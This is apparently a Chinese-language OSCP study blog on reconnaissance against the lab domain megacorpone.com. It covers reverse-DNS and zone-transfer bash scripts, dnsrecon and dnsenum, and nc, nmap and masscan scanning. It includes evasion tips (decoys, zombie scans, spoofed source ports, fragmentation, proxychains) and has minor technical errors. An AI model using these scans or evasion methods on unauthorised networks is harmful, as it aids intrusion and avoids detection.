 69 ELAPSED_SEC=$((CURRENT_TIME - START_TIME))
 70 if [ $COUNT -gt 0 ]; then
 71 AVG_TIME_PER_REC=$((ELAPSED_SEC / COUNT))
 72 REMAINING=$((TOTAL - COUNT))
 73 ESTIMATED_REMAINING_SEC=$((AVG_TIME_PER_REC * REMAINING))
 74 MINS_REMAINING=$((ESTIMATED_REMAINING_SEC / 60))
 75 SECS_REMAINING=$((ESTIMATED_REMAINING_SEC % 60))
 76 fi
 77 
 78 # 计算进度百分比
 79 PERCENT=$((COUNT * 100 / TOTAL))
 80 
 81 # 创建简洁的当前查询显示
 82 display_query="$IP"
 83 if [ ${#IP} -gt 25 ]; then
 84 display_query="${IP:0:22}..."
 85 fi
 86 
 87 # 创建进度条
 88 bar=""
 89 for ((i=0; i<50; i++)); do
 90 if [ $i -lt $((PERCENT / 2)) ]; then
 91 bar="${bar}#"
 92 else
 93 bar="${bar}."
 94 fi
 95 done
 96 
 97 # 显示进度信息
 98 printf "进度: [%-50s] %3d%% | %d/%d | 时间: %02d:%02d | ETA: %02d:%02d | 当前: %s\r" \
 99 "$bar" $PERCENT $COUNT $TOTAL \
100 $((ELAPSED_SEC / 60)) $((ELAPSED_SEC % 60)) \
101 $MINS_REMAINING $SECS_REMAINING \
102 "$display_query"
103 
104 # 执行反向DNS查询
105 result=$(host "$IP" 2>/dev/null)
106 
107 # 处理结果
108 if [[ "$result" == *"domain name pointer"* ]]; then
109 ((FOUND++))
110 
111 # 提取域名
112 domain=$(echo "$result" | grep -oP 'domain name pointer \K[^.]+(\.[^.]+)+' | head -1)
113 
114 # 1. 输出原始格式结果
115 echo "$result"
116 
117 # 2. 保存结果用于表格
118 echo "$IP,$domain" >> "$RESULT_FILE"
119 
120 # 3. 添加到CSV文件
121 echo "$IP,$domain" >> "$CSV_OUTPUT"
122 fi
123done
124
125# 清除进度行
126printf "\n\n"
127
128# 计算总耗时
129END_TIME=$(date +%s)
130TOTAL_TIME=$((END_TIME - START_TIME))
131
132# 显示表格总结
133if [ -s "$RESULT_FILE" ]; then
134 echo "============================="
135 echo "扫描结果汇总 (反向DNS记录)"
136 echo "============================="
137 echo
138 
139 # 确保表格对齐
140 max_ip_len=15 # "IP地址" 标题长度
141 max_domain_len=20 # "域名" 标题长度
142 
143 # 读取结果计算最大长度
144 while IFS=, read -r ip domain; do
145 if [ ${#ip} -gt $max_ip_len ]; then
146 max_ip_len=${#ip}
147 fi
148 
149 if [ ${#domain} -gt $max_domain_len ]; then
150 max_domain_len=${#domain}
151 fi
152 done < "$RESULT_FILE"
153 
154 # 添加边距
155 max_ip_len=$((max_ip_len + 2))
156 max_domain_len=$((max_domain_len + 2))
157 if [ $max_ip_len -lt 15 ]; then max_ip_len=15; fi
158 if [ $max_domain_len -lt 20 ]; then max_domain_len=20; fi
159 
160 # 创建表格顶部
161 printf "┌─%s─┬─%s─┐\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
162 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
163 
164 # 表格标题
165 printf "│ %-${max_ip_len}s │ %-${max_domain_len}s │\n" "IP地址" "域名"
166 printf "├─%s─┼─%s─┤\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
167 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
168 
169 # 表格内容
170 while IFS=, read -r ip domain; do
171 printf "│ %-${max_ip_len}s │ %-${max_domain_len}s │\n" "$ip" "$domain"
172 done < "$RESULT_FILE"
173 
174 # 表格底部
175 printf "└─%s─┴─%s─┘\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
176 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
177 echo
178fi
179
180# 输出统计信息
181echo "============================="
182echo "扫描完成"
183echo "结束时间: $(date)"
184echo "总耗时: $((TOTAL_TIME / 60)) 分钟 $((TOTAL_TIME % 60)) 秒"
185echo "共扫描: $COUNT 个IP地址"
186echo "发现: $FOUND 个反向DNS记录"
187echo "CSV文件: $CSV_OUTPUT"
188echo "============================="
189
190# 清理临时文件
191rm -f "$RESULT_FILE"

对比可以发现，反向查找出来了一些正向用字典没又找到的子域名。

用命令来辅助我们发现新域名，这些新域名，新IP中可能包含易于攻击的系统。

1comm -13 \
2 <(awk -F, 'NR>1{print $1}' megacorpone.com.csv | sort -u) \
3 <(awk -F, 'NR>1 && $2~/megacorpone\.com$/{print $2}' 167.114.21_50-100_reverse_dns.csv | sort -u) \
4| xargs -I{} grep -i ",{}$" 167.114.21_50-100_reverse_dns.csv \
5| column -t -s, -N "IP地址,域名"

对两个CSV细致分析的还可以用下面这个脚本

 1#!/bin/bash
 2# 脚本名称: dns_analyzer.sh
 3# 功能: 智能分析DNS扫描CSV文件，支持子域名统计和反向DNS统计
 4# 用法: ./dns_analyzer.sh 输入文件.csv
 5
 6# 错误处理
 7die() {
 8 echo "错误: $1" >&2
 9 exit 1
 10}
 11
 12# 检查参数
 13if [ $# -ne 1 ]; then
 14 die "用法: $0 输入文件.csv"
 15fi
 16
 17INPUT_FILE="$1"
 18if [ ! -f "$INPUT_FILE" ]; then
 19 die "文件不存在: $INPUT_FILE"
 20fi
 21
 22# 检测文件类型
 23if head -1 "$INPUT_FILE" | grep -qE "子域名,IP地址|subdomain,ip"; then
 24 echo "检测到子域名扫描CSV文件"
 25 FILE_TYPE="subdomain"
 26elif head -1 "$INPUT_FILE" | grep -qE "IP地址,域名|ip,domain"; then
 27 echo "检测到反向DNS扫描CSV文件"
 28 FILE_TYPE="reverse"
 29else
 30 die "无法识别CSV文件类型 - 请确保文件包含正确的标题行"
 31fi
 32
 33# 美观的域名列表输出函数
 34pretty_print_domains() {
 35 local domains="$1"
 36 local max_length=0
 37 local count=0
 38 
 39 # 将域名拆分为数组
 40 IFS=',' read -ra DOMAIN_ARRAY <<< "$domains"
 41 count=${#DOMAIN_ARRAY[@]}
 42 
 43 # 计算最大域名长度
 44 for domain in "${DOMAIN_ARRAY[@]}"; do
 45 domain=$(echo "$domain" | xargs) # 去除前后空格
 46 len=${#domain}
 47 if (( len > max_length )); then
 48 max_length=$len
 49 fi
 50 done
 51 
 52 # 计算列数和每列宽度
 53 local columns=$(( $(tput cols) / (max_length + 4) ))
 54 if (( columns < 1 )); then columns=1; fi
 55 if (( columns > 6 )); then columns=6; fi
 56 
 57 # 计算行数
 58 local rows=$(( (count + columns - 1) / columns ))
 59 
 60 # 格式化输出
 61 echo
 62 for (( i=0; i<rows; i++ )); do
 63 printf " "
 64 for (( j=0; j<columns; j++ )); do
 65 idx=$(( i + j * rows ))
 66 if (( idx < count )); then
 67 domain=$(echo "${DOMAIN_ARRAY[$idx]}" | xargs)
 68 printf "%-*s" $((max_length + 4)) "$domain"
 69 fi
 70 done
 71 echo
 72 done
 73 echo
 74}
 75
 76# 处理子域名文件
 77process_subdomain() {
 78 local file="$1"
 79 
 80 # 按IP排序
 81 echo -e "\n\033[1;34m按IP地址排序:\033[0m"
 82 awk -F, 'NR>1' "$file" | sort -t, -k2 | column -t -s, -N "子域名,IP地址"
 83 
 84 # IP重复统计
 85 echo -e "\n\033[1;34mIP地址重复统计:\033[0m"
 86 awk -F, 'NR>1 {ip_count[$2]++} END {
 87 for (ip in ip_count) {
 88 printf "%d\t%s\n", ip_count[ip], ip
 89 }
 90 }' "$file" | sort -nr | column -t -N "重复次数,IP地址"
 91 
 92 # 重复最多的IP
 93 echo -e "\n\033[1;34m重复最多的IP地址:\033[0m"
 94 awk -F, 'NR>1 {ip_count[$2]++} END {
 95 max_count = 0
 96 for (ip in ip_count) {
 97 if (ip_count[ip] > max_count) {
 98 max_count = ip_count[ip]
 99 max_ip = ip
100 }
101 }
102 printf "IP地址: %s\n重复次数: %d\n", max_ip, max_count
103 }' "$file"
104}
105
106# 处理反向DNS文件
107process_reverse() {
108 local file="$1"
109 
110 # 主域名统计
111 echo -e "\n\033[1;34m主域名出现统计:\033[0m"
112 awk -F, 'NR>1 && $2 != "" {
113 # 提取主域名
114 n = split($2, parts, ".")
115 if (n > 1) {
116 main_domain = parts[n-1] "." parts[n]
117 domain_count[main_domain]++
118 }
119 } END {
120 for (d in domain_count) {
121 printf "%d\t%s\n", domain_count[d], d
122 }
123 }' "$file" | sort -nr | column -t -N "出现次数,主域名"
124 
125 # 重复最多的主域名
126 echo -e "\n\033[1;34m重复最多的主域名:\033[0m"
127 awk -F, 'NR>1 && $2 != "" {
128 n = split($2, parts, ".")
129 if (n > 1) {
130 main_domain = parts[n-1] "." parts[n]
131 domain_count[main_domain]++
132 }
133 } END {
134 max_count = 0
135 for (d in domain_count) {
136 if (domain_count[d] > max_count) {
137 max_count = domain_count[d]
138 max_domain = d
139 }
140 }
141 printf "主域名: %s\n出现次数: %d\n", max_domain, max_count
142 }' "$file"
143 
144 # 主域名关联的完整域名（美观格式）
145 echo -e "\n\033[1;34m主域名关联的完整域名:\033[0m"
146 awk -F, 'BEGIN {print "开始收集域名..."} 
147 NR>1 && $2 != "" {
148 n = split($2, parts, ".")
149 if (n > 1) {
150 main_domain = parts[n-1] "." parts[n]
151 if (!(main_domain in domain_list)) {
152 domain_list[main_domain] = $2
153 } else {
154 domain_list[main_domain] = domain_list[main_domain] "," $2
155 }
156 # print "收集: " $2 " -> " main_domain
157 }
158 } END {
159 print "收集完成，开始输出..."
160 for (d in domain_list) {
161 printf "%s:%s\n", d, domain_list[d]
162 }
163 }' "$file" > /tmp/domain_groups.txt
164 
165 while IFS=: read -r domain_group domains; do
166 echo -e "\033[1;32m$domain_group:\033[0m"
167 pretty_print_domains "$domains"
168 done < /tmp/domain_groups.txt
169 rm -f /tmp/domain_groups.txt
170}
171
172# 根据文件类型执行相应处理
173case "$FILE_TYPE" in
174 subdomain)
175 process_subdomain "$INPUT_FILE"
176 ;;
177 reverse)
178 process_reverse "$INPUT_FILE"
179 ;;
180 *)
181 die "未知文件类型"
182 ;;
183esac
184
185echo -e "\n\033[1;32m分析完成!\033[0m"

区域传输

DNS区域传输基本上是相关DNS服务器之间的数据库复制，其中区域文件从主DNS服务器复制到从DNS服务器。区域文件包含所有DNS的列表为该区域配置的名称。区域传输应该只允许授权的从DNS但是许多管理员错误地配置了他们的DNS服务器，在这些情况下，任何人都问DNS服务器区域通常会收到一个副本。这相当于把公司的网络布局放在硬盘上交给黑客。所有的名字，服务器的地址和功能可能会暴露在窥探者的视线之下。成功的区域传输不会直接导致网络破坏，尽管它确实有助于这个过程（主要是信息泄露）。执行分区传输的host命令语法如下：

1host -l megacorpone.com ns1.megacorpone.com

可以看到ns2是有区域传输漏洞的。

此服务器允许区域传输，并提供区域文件的完整转储megacorpone.com域名，提供方便的IP地址列表和相应的DNS主机名! megacorpone.com域需要检查的DNS服务器非常少。然而，一些较大的组织可能托管许多DNS服务器，或者我们可能想要尝试区域传输请求针对给定域中的所有DNS服务器。Bash脚本可以帮助完成这项任务。要尝试使用host命令进行区域传输，我们需要两个参数：名称服务器地址和域名。我们可以使用以下命令获取给定域的名称服务器命令:

1host -t ns megacorpone.com | cut -d " " -f 4

 1#!/bin/bash
 2# Simple Zone Transfer Bash Script
 3# $1 is the first argument given after the bash script
 4# Check if argument was given, if not, print usage
 5if [ -z "$1" ]; then
 6 echo "[*] Simple Zone transfer script"
 7 echo "[*] Usage : $0 <domain name> "
 8 exit 0
 9fi
10# if argument was given, identify the DNS servers for the domain
11for server in $(host -t ns $1 | cut -d " " -f4); do
12 # For each of these servers, attempt a zone transfer
13 host -l $1 $server |grep "has address"
14done

Kali自带的DNS枚举工具

DNSrecon

1sudo apt update && sudo apt install dnsrecon -y
2dnsrecon -h
3dnsrecon -d megacorpone.com
4dnsrecon -d megacorpone.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # 子域名暴力破解
5dnsrecon -r 167.114.21.0-167.114.21.255 # 反向爆破
6dnsrecon -d megacorpone.com -t axfr # 区域传送漏洞检测

DNSenum

1dnsenum zonetransfer.me
2dnsenum -f /usr/share/wordlists/dnsmap.txt megacorpone.com
3dnsenum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt megacorpone.com

7.1.6.3练习

查找megacorpone.com域的DNS服务器。
编写一个小脚本，尝试使用更高级别从megacorpone.com进行区域传输，脚本语言，如Python、Perl或Ruby。
重新创建上面的示例，并使用dnsrecon尝试从megacorpone.com。

2.改写小脚本

完整脚本可以关注我公众号后台回复关键字领取。

python使用示例：

# 基本用法
python3 subdomain_finder.py megacorpone.com

# 自定义字典和输出
python3 subdomain_finder.py megacorpone.com \
 -w custom.txt \
 -o results.csv

端口扫描

端口扫描是检查远程计算机上的TCP或UDP端口的过程，目的是检测目标上正在运行的服务以及可能存在的潜在攻击媒介。

在一些网络基础设施落后的国家，简单的扫描就有可能导致网站崩溃（DDOS），所以一些国家将扫描视为违法行为。在中国大多数云服务器都能抗住普通扫描的流量。

TCP/UDP扫描使用NC

TCP扫描

最简单的TCP端口扫描技术通常称为CONNECT扫描，它依赖于三向TCP握手195机制。设计此机制是为了使两个尝试进行通信的主机可以在传输任何数据之前协商网络TCP套接字连接的参数。在没有专门的扫描工具的时候，也可以使用Netcat来改造一下。

1 nc -nv -w 1 -z 192.168.1.1 3388-3390
2 sudo tshark -i eth0 -f "tcp portrange 3388-3390"

UDP扫描

由于UDP是无状态的，并且不涉及三向握手，因此UDP端口扫描的机制不同于TCP。udp是无状态尽力传输协议，没有三次握手机制，使用针对协议的udp扫描提高准确度，发送udp空包，端口开放服务器无响应，端口关闭返回icmp端口不可达。此机制扫描结果不完全准确，但是很多攻击向量（应用处理异常，FW过滤icmp包），而且nc很小，主要是在内网收到限制的时候使用。

1nc -nv -u -z -w 1 192.168.1.1 160-162
2sudo tshark -i eth0 -f "udp portrange 160-162"

Nmap端口扫描

虽然Nmap扫描功能很强大，但是很多的nmap扫描选项需要访问 raw sockets，因此需要sudo执行，否则扫描能力受限。很多防火墙都对Nmap做了限制。

对防火墙设置一些规则，来观察Nmap产生的流量有多大。

步骤 1：设置防火墙规则（允许特定 IP 通行）

sudo iptables -I INPUT 1 -s 38.100.193.70 -j ACCEPT
sudo iptables -I OUTPUT 1 -d 38.100.193.70 -j ACCEPT

作用：
- 允许来自 38.100.193.70 的入站流量（INPUT 链）。
- 允许发送到 38.100.193.70 的出站流量（OUTPUT 链）。
目的：确保后续 nmap 扫描不会被防火墙拦截，同时防火墙会记录流量统计。注意 38.100.193.70 是OSCP官方给的练手网站的IP地址，这个IP是会变动的，请根据host的结果调整。

步骤 2：重置防火墙计数器

sudo iptables -Z

作用：清零所有 iptables 规则的流量计数器（包数 pkts 和字节数 bytes）。
目的：为后续扫描流量统计做准备，确保计数从零开始。

步骤 3：执行第一次端口扫描（默认扫描）

sudo nmap 38.100.193.70

作用：扫描目标 IP 的 常用 1000 个端口。
目的：触发与目标 IP 的网络通信，防火墙会记录流量。

步骤 4：查看流量统计（第一次）

sudo iptables -vn -L

作用：查看防火墙规则详情：
- -v：显示详细计数（包数、字节数）。
-n：不解析 IP 和端口（直接显示数字）。

步骤 5：再次重置计数器

sudo iptables -Z

目的：为第二次扫描准备干净的计数起点。

步骤 6：执行第二次端口扫描（全端口扫描）

nmap -p- 38.100.193.70

作用：扫描目标 IP 的 全端口（1-65535），此操作耗时较长（约 10-30 分钟）。
目的：触发更大规模的流量，对比两次扫描的流量差异。

步骤 7：查看最终流量统计

sudo iptables -vn -L

作用：显示第二次扫描后的流量统计。
目的：
- 比较 pkts 和 bytes 与第一次扫描的差异（全端口扫描的流量更大）。
- 验证防火墙规则是否正确捕获流量。

结束后清理规则

# 删除添加的规则（避免影响后续操作）
sudo iptables -D INPUT -s 38.100.193.70 -j ACCEPT
sudo iptables -D OUTPUT -d 38.100.193.70 -j ACCEPT

C段全端口扫描大约消耗1gb流量，大段扫描的时候应该考虑带宽、速度、流量等问题。如果大量的去扫，还没有挂代理池的情况下，你短时间目标防火墙接搜到一个G的流量，百分百会反制封锁你的IP地址。一般扫描，最好挂代理，或者IP伪造（治标不治本），在这种情况下才可以做大量的暴力扫描，不然很容易出事。

Nmap的SYN“隐蔽”扫描

Nmap默认使用SYN扫描，不完成三次握手，信息未达应用层，不产生应用层日志（网络层检测），快速。现代防火墙普遍具有半开连接的检测能力，所谓的隐蔽扫描，一点都不隐蔽，反倒是对小白有误导。

1. 什么是 SYN 扫描 (`-sS`)?

TCP 连接建立基础：

正常的 TCP 连接需要完成“三次握手”：
1. 客户端 -> 服务器：发送 SYN 包 (请求建立连接)
2. 服务器 -> 客户端：发送 SYN-ACK 包 (同意建立连接)
3. 客户端 -> 服务器：发送 ACK 包 (确认连接建立，数据可开始传输)
SYN 扫描的原理：
- Nmap 扮演客户端，向目标端口发送一个伪造源地址的 SYN 包 (第 1 步)。
- 如果目标端口开放：目标主机会回应一个 SYN-ACK 包 (第 2 步)。
- 关键点来了：Nmap 看到 SYN-ACK 回应后，不会发送完成握手的 ACK 包 (第 3 步)！相反，它发送一个 RST (复位) 包来立即终止这个半开的连接。
- 如果目标端口关闭：目标主机会回应一个 RST 包。
- 如果目标端口 被过滤（防火墙拦截）：Nmap 通常收不到任何回应，或者收到 ICMP 错误消息。
为何在应用层“隐蔽”：
- 由于 Nmap 没有发送最后的 ACK 来完成握手，TCP 连接从未真正建立。
- 因此，目标端口上监听的应用程序服务程序（如 Web 服务器、数据库服务）根本没有被激活。操作系统内核的网络协议栈在处理到 SYN-ACK 回复这一步后就因为收到 RST 而终止连接。
- 结果：应用层日志里通常找不到这次扫描的记录。 应用服务完全不知道有人尝试连接过。

2. 为何“对小白有误导”？为什么说“一点都不隐蔽”？

虽然 SYN 扫描避开了应用层日志，但这并不意味着它在网络层面是隐蔽的或不留下痕迹。主要的误导在于初学者可能会认为“不在应用日志里 == 完全隐身”。这是错误的认知。

现代防火墙/IDS/IPS 的检测能力：
- 状态检测 (Stateful Inspection)： 这是现代防火墙最基本、最核心的功能之一。防火墙会跟踪所有连接的状态。当它看到一个进来的 SYN 包，但随后看到的是客户端的 RST 包（而不是正常的 ACK）时，它就知道这个连接没有完成正常的三次握手。这是一个非常明显的异常行为特征。
- 检测 SYN 扫描模式： 高级安全设备会分析网络流量模式。短时间内（几秒或几分钟内）向大量不同端口发送 SYN 包，并且每个连接都停留在“半开”状态（即没有后续的 ACK），这极其符合 SYN 端口扫描的特征模式。安全设备可以很容易地通过这种流量特征或速率检测出扫描行为。
- 记录和告警： 虽然应用层服务没日志，但防火墙、入侵检测系统 (IDS)、入侵防御系统 (IPS) 和专业的网络安全监控 (NSM) 平台非常擅长检测、记录和产生大量的告警来报告 SYN 扫描活动。这些日志和告警通常包含源 IP、时间戳、扫描的端口数量等信息。
- 生成“防火墙日志”： 防火墙会记录这些被检测到的扫描包（丢弃的或被接受的半开连接），而这些日志是网络管理员和安全分析师最常查看的地方。
总结 “一点都不隐蔽”： 虽然 SYN 扫描避开了最表层（应用日志），但它在网络层/传输层留下了极其清晰、易于被现代安全设备识别的特征指纹。在稍有安全防护措施的网络中，这样的扫描就像是黑夜里点燃的信号弹一样明显。安全运维人员第一时间就能看到防火墙或 SIEM 系统发出的 SYN Flood 或端口扫描告警。

3. 怎么达到（相对）隐蔽的目的？

绝对的隐蔽在互联网扫描中几乎是不可能的。防御方有多种手段（流量监控、蜜罐、ISP 合作等）来检测扫描活动。我们的目标通常是降低检测率、减少告警噪音、延缓被发现的时间、避免被轻易追踪或封禁。一些更隐蔽的扫描技术包括：

FIN 扫描 (-sF)， NULL 扫描 (-sN)， Xmas 扫描 (-sX):
- 原理： 利用 TCP RFC 规定的一个“小漏洞”：当一个关闭的端口收到不携带 SYN、ACK 或 RST 标志位的怪异包（如只带 FIN、只带 NULL 标志、或者组合了 FIN/URG/PSH 像圣诞树灯一样 - 故名 Xmas）时，应该回复一个 RST 包。而开放的端口则应该忽略这种不符合连接状态的包，不回复。
- 相对隐蔽性： 这种扫描不会尝试建立连接（没有 SYN 包），不是半开连接。它们更像是“敲门试探”。状态防火墙跟踪连接状态时，这些包属于不连接任何现有流量的“异常包”，更难以被仅依赖状态检测的设备识别为扫描（虽然专门检测端口扫描的设备仍然可能抓到）。它们模仿的是连接关闭后残留的迷途包。
- 局限性： 很多非 Unix 系统（如 Windows）的 TCP 栈不严格遵守 RFC，无论端口开放与否，都一律回复 RST。这使得这些扫描对 Windows 主机无效。效果高度依赖于目标系统实现。
ACK 扫描 (-sA):
- 原理： 只发送一个设置了 ACK 位的 TCP 包（通常这是三次握手之后的数据包才会有的标志）。不开放端口的防火墙或无状态防火墙会允许 ACK 到达主机，主机根据本地连接状态（肯定没有这个连接）回复一个 RST。而开放端口且配置了严格状态防火墙的服务器可能会直接丢弃这个 ACK，或者服务器回复 RST 但防火墙阻止了（取决于防火墙规则）。
- 目的： 主要用于探测目标主机防火墙的状态和规则（是否有状态检测？是否过滤入站包？是否屏蔽特定端口？），而不是直接判断端口开放与否（虽然可以通过是否有 RST 回复间接推断端口是否被防火墙过滤）。本身不那么像端口扫描，更像是网络设备探测。
- 相对隐蔽性： 单个 ACK 包在大量合法流量中不太起眼。不易被简单的 SYN 扫描检测规则发现。
Idle / Zombie 扫描 (-sI)：
- 原理： 这是最隐蔽的扫描技术之一。利用一个网络上的空闲主机（僵尸/Zombie）的 IP 标识值 (IP ID) 来间接推断目标端口的开放状态。整个过程 Nmap 自身 IP 完全不直接与目标主机通信，所有通信都由 Zombie 发起（或对 Zombie 发起的伪造包做出响应）。
- 相对隐蔽性： 极高的隐蔽性。目标主机看到的扫描来源是 Zombie 主机，而不是你的扫描机（源 IP 欺骗）。目标主机与 Zombie 主机之间的交互（探测包）更像是正常的、零星的网络试探。
- 复杂性和局限性： 实施非常复杂（需要找到合适的 Zombie 主机，其 IP ID 需是可预测增长的），成功率受很多因素影响（Zombie 的网络活动、路由过滤等）。效率较低。
降低检测率的关键策略 (与扫描技术结合使用)：
- 极慢速率 (--scan-delay, --max-rate): 将扫描速度降至非常低（如每秒甚至每分钟几个包），模仿正常用户的间歇性访问，融入背景噪声。这是最有效的隐蔽手段之一，但耗时极长。
- 分散时间 (-T ): 使用 -T 0 (Paranoid) 或 -T 1 (Sneaky) 等最慢的时序模板，人为引入大量随机延迟。
- 诱饵扫描 (-D)： 指定多个诱饵 IP（-D decoy1,decoy2,decoy3,ME）。这样目标会看到来自大量不同 IP 的扫描（包括诱饵和你的真实 IP），增加了追踪真实源的难度。需要诱饵 IP 确实存在且在网络上可达才能有效混淆。
- 源端口伪装 (-g/--source-port)： 使用常见的、被认为合法的源端口（如 HTTP/80, DNS/53），有时可以骗过非常简陋的基于端口号的过滤规则。
- 分片扫描 (-f, --mtu)： 将扫描包分片发送，增加防火墙/IDS 重组和分析内容的难度（但很多设备能重组分片）。
- 使用代理链或 Tor： 通过层层代理或 Tor 网络进行扫描，隐藏扫描源的真实 IP 地址。Tor 出口节点 IP 容易被封禁且扫描速度极慢。

总结

SYN 扫描 (-sS) 原理： 发送 SYN，接收 SYN-ACK 后立即发送 RST，制造“半开连接”，不建立完整连接，避开应用层日志。
误导性/不隐蔽： 因其明显的“短时间大量半开连接”特征，极易被现代状态防火墙、IDS/IPS 通过状态跟踪和流量模式分析检测到并告警。它在网络防御层留下的痕迹非常深，对新手造成了“应用层没日志=没人发现”的错误印象。
（相对）隐蔽方法： 使用非常规扫描类型 (FIN, NULL, Xmas, ACK, Idle/Zombie)，并最重要的结合极慢的扫描速率 (--scan-delay, -T 0/1)，辅以诱饵 (-D)、源端口伪装 (-g) 或代理/Tor 等策略。“慢”常常是最大的隐蔽武器。 但记住，没有扫描是真正完全隐形的。

扫描命令：

1sudo nmap 38.100.193.70 -sS
2sudo nmap 38.100.193.70 -sT
3sudo nmap 38.100.193.70 -sU
4sudo nmap 38.100.193.70 -sS -sU
5sudo nmap 38.100.193.70 -sn
6sudo nmap 38.100.193.70 -O
7sudo nmap 38.100.193.70 -sV -A
8sudo nmap 38.100.193.70 --script = smb-os-discovery
9sudo nmap 38.100.193.70 --script = dns-zone-transfer

命令解析

sudo nmap 38.100.193.70 -sS
- 作用：TCP SYN 扫描（半开扫描）。
- 原理：发送 SYN 包，收到 SYN-ACK 即判断端口开放（不完成三次握手），速度快且隐蔽（不触发应用层日志）。
- 权限：需要 sudo（需构造原始数据包）。
sudo nmap 38.100.193.70 -sT
- 作用：TCP 连接扫描。
- 原理：完成完整的三次握手。速度慢但准确性高，适用于无 sudo 权限时，但会触发应用层日志。
sudo nmap 38.100.193.70 -sU
- 作用：UDP 扫描。
- 原理：向 UDP 端口发送探测包，通过响应判断状态（如 DNS/DHCP 服务）。速度极慢（UDP 无响应重传机制）。
sudo nmap 38.100.193.70 -sS -sU
- 作用：组合 TCP SYN 扫描 + UDP 扫描。
- 用途：全面检测目标机器的 TCP/UDP 开放端口。
sudo nmap 38.100.193.70 -sn
- 作用：主机发现（Ping 扫描）。
- 原理：不扫描端口，仅检测目标是否在线（使用 ARP/ICMP/TCP 等协议探测）。
sudo nmap 38.100.193.70 -O
- 作用：操作系统指纹识别。
- 原理：通过 TCP/IP 协议栈行为（如 TTL 值、窗口大小）推测目标操作系统。
sudo nmap 38.100.193.70 -sV -A
- 作用：全面扫描组合。
  - -sV：服务版本探测。
  - -A：启用 OS 识别、版本探测、脚本扫描和路由跟踪。
- 输出：开放端口、服务版本、操作系统、可能漏洞。
sudo nmap 38.100.193.70 --script=smb-os-discovery
- 作用：使用 NSE 脚本 smb-os-discovery 获取 Windows/Samba 系统的操作系统信息。
- 用途：识别 SMB 服务的主机名、系统版本等。
sudo nmap 38.100.193.70 --script=dns-zone-transfer
- 作用：使用 NSE 脚本 dns-zone-transfer 尝试 DNS 域传送。
- 用途：检测 DNS 服务器配置错误（泄露所有域名记录）。

Nmap 常用技巧

保存输出：

nmap -oN report.txt -oX report.xml 38.100.193.70 # 文本/XML 格式
nmap -oG - 38.100.193.70 | grep "open" # 提取开放端口

对比扫描结果：

ndiff scan1.xml scan2.xml # 检测目标变化

搜索 NSE 脚本：

ls /usr/share/nmap/scripts/*http* # 查找 HTTP 相关脚本
nmap --script-help=http-vuln* # 查看脚本帮助

实用技巧

# 1. 将扫描结果导入Metasploit
cat top-port-sweep.txt | awk '/Up/{print $2}' > hosts.txt
msfconsole -qx "db_import hosts.txt; services"

# 2. 生成拓扑图（需Nmap编译图形支持）
nmap -sn --traceroute --packet-trace 38.100.193.0/24 -oX netmap.xml
xsltproc netmap.xml -o topology.html

Masscan快速网络扫描

为扫描整个互联网而设计，六分钟扫描整个互联网，每秒发送一千万个包，masscan实现了自定义的tcp/ip栈堆需要使用sudo权限。

sudo apt install masscan 
sudo masscan -p80 192.168.1.0/8 
sudo macscan -p80 192.168.1.0/24 --rate=1000 -e tap0 --router -ip 192.168.1.1

命令解析

1. `sudo masscan -p80 192.168.1.0/8`

作用：对超大型网络进行快速端口扫描
关键参数：
- -p80：只扫描80端口（HTTP服务）
- 192.168.1.0/8：扫描整个B类私有网络（192.0.0.0 - 192.255.255.255），包含 1677万台主机
执行流程：
1. 不进行主机发现，直接扫描目标端口

通过SYN扫描发送TCP SYN包到目标80端口
收到SYN/ACK响应则标记为开放

风险：
- 扫描范围过大可能导致网络拥塞
可能触发大规模安全告警

2. `sudo masscan -p80 192.168.1.0/24 --rate=1000 -e tap0 --router-ip 192.168.1.1`

作用：对特定子网进行精确控制的扫描
修正：应为masscan（非macscan）
关键参数：
- -p80：扫描80端口
- 192.168.1.0/24：扫描C类子网（254个主机）
- --rate=1000：限速1000包/秒
- -e tap0：使用特定虚拟网络接口
- --router-ip 192.168.1.1：指定网关IP用于ARP解析
执行流程：
1. 向网关192.168.1.1发送ARP请求

获取目标主机MAC地址
通过tap0接口发送定制SYN包
严格按1000包/秒速率扫描

Masscan 核心优势

特性	Masscan	Nmap
扫描速度	100万包/秒	数千包/秒
大型网络处理	内置分片处理	需要手动分割
资源消耗	低内存占用	较高内存占用
扫描精度	端口状态检测	完整协议栈交互
隐蔽性	无状态扫描	有状态检测

Masscan 实用用法示例

1. 基础扫描

# 扫描单个IP的TOP100端口
sudo masscan 203.0.113.1 -p0-65535 --top-ports 100

# 扫描网段的多端口（HTTP/HTTPS）
sudo masscan 192.168.1.0/24 -p80,443,8000-8100

2. 精准速率控制

# 限制扫描速率（避免触发防火墙）
sudo masscan 10.0.0.0/16 -p22 --rate=500 # 500包/秒

# 随机化扫描顺序
sudo masscan 192.168.0.0/24 -p80 --randomize-hosts

3. 大型网络扫描优化

# 分布式扫描（多文件分片）
sudo masscan 172.16.0.0/12 -p443 --shard 1/10 # 第1/10片段
sudo masscan 172.16.0.0/12 -p443 --shard 2/10 # 第2/10片段

# 保存/恢复扫描进度
sudo masscan -p80 10.0.0.0/8 -oJ scan.json --resume paused.conf

4. 结果输出与处理

# XML格式输出（兼容Nmap工具）
sudo masscan 192.168.1.0/24 -p1-100 -oX scan.xml

# 提取开放端口IP
sudo masscan -p443 203.0.113.0/24 -oG - | grep 'open' | awk '{print $4}'

# 生成可视化报告
masscan -p80 192.168.1.0/24 -oX scan.xml
nmap-parse-output scan.xml html > report.html

5. 绕过防火墙技巧

# 伪装源端口（使用53端口发送）
sudo masscan -p80 203.0.113.0/24 --source-port 53

# 使用代理链扫描
proxychains masscan -p443 198.51.100.0/24

# 分片数据包
sudo masscan -p22 192.168.1.0/24 --mtu 512

使用场景对比

场景	推荐命令
快速资产发现	`masscan -p80,443 10.0.0.0/8 --rate=10000`
精确服务扫描	`nmap -sV -O 192.168.1.1-100`
超大型网络端口普查	`masscan 203.0.113.0/24 --shard 1/50`
内网隐蔽扫描	`nmap -T2 -sS -Pn --scan-delay 500ms`

注意事项

法律合规：扫描前必须获得明确授权
